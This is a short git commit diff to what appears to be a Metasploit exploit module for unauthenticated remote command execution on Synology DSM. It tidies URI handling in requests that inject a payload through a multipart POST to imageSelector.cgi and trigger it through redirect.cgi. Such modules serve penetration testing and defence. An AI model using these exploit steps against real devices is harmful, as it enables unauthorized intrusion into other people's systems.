Do send_request_cgi final clean up

jvazquez-r7 · jvazquez-r7 · commit 163a54f8b1d2 · 2013-12-20T17:00:57.000-06:00
diff --git a/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb b/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb
@@ -68,8 +68,9 @@ def check
     print_status("#{peer} - Trying to detect installed version")
 
     res = send_request_cgi({
-     'method' => 'GET',
-     'uri'    => normalize_uri('/webman/info.cgi?host=')
+      'method'   => 'GET',
+      'uri'      => normalize_uri('webman', 'info.cgi'),
+      'vars_get' => { 'host' => ''}
     })
 
     if res and res.code == 200 and res.body =~ DEVICE_INFO_PATTERN
@@ -127,7 +128,7 @@ def exploit
     print_status("#{peer} - Injecting the payload...")
     res = send_request_cgi({
       'method'  => 'POST',
-      'uri'     => '/webman/imageSelector.cgi',
+      'uri'     => normalize_uri('webman', 'imageSelector.cgi'),
       'ctype'   => "multipart/form-data; boundary=#{mime_msg.bound}",
       'headers' => {
         'X-TYPE-NAME' => 'SLICEUPLOAD',
@@ -144,7 +145,7 @@ def exploit
     print_status("#{peer} - Executing the payload...")
     res = send_request_cgi({
       'method' => 'GET',
-      'uri'    => '/redirect.cgi'
+      'uri'    => normalize_uri('redirect.cgi'),
     })
 
     # Read command output if cmd/unix/generic payload was used
